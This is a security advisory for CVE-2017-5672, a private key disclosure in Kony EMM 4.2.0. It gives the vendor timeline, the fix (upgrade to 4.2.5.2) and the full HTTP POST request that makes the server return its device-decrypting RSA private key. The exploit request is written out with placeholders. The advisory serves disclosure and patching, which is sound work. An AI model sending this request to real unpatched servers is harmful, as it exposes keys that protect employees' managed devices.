Kony EMM 4.2.0 Private Key Disclosure

`------------------------------------------------------------------------  
  
Product: Enterprise Mobile Management  
Vendor: Kony  
Vulnerable Version(s): Kony EMM 4.2.0 and probably older versions   
Tested Version: Kony EMM 4.2.0   
Advisory Publication: 20 March 2017   
Vendor Notification: 29 Jan 2017   
Vulnerability Type: Private Key Disclosure   
CVE Reference: CVE-2017-5672   
Risk Level: Medium   
Status: Solution is released Kony EMM 4.2.5.2  
Discovered and Provided: Ayman Almajid  
------------------------------------------------------------------------  
  
About the vendor:  
Kony EMM is a mobile management suite that allows organizations to manage employee's personal devices. It enables users to use their own device, or as often called BYOD or "bring your own device".  
  
About the vulnerability:  
During a pentest we discovered that a logged in user can manipulate the HTTP request and cause the EMM server to send the RSA private key which is used to decrypt the device.  
  
By submitting the below HTTP request, the private key will be received on the response:  
  
POST /emm/device/rest/myapps HTTP/1.1  
Accept-Encoding: gzip  
adke: 1  
devicemodel: <device_model>  
devicename: android  
osversion: <os_version>  
Content-Type: application/x-www-form-urlencoded  
platformid: ANDROID  
lv: 1.0.0.7  
deviceid: <device_id>  
Accept: application/json  
Accept-Language: en  
Content-Length: 65  
Host: <host>  
Connection: close  
User-Agent: <user_agent>  
Expect: 100-continue  
Cookie: <cookies>  
  
platformid=ANDROID&afw1000=true&enc=true&afw1001=false&isEMM=true  
  
  
-----------------------  
  
Solution:  
  
Upgrade to Kony EMM 4.2.5.2  
  
References:  
  
[1] help AG middle East http://www.helpag.com  
[2] Kony https://kony.com  
`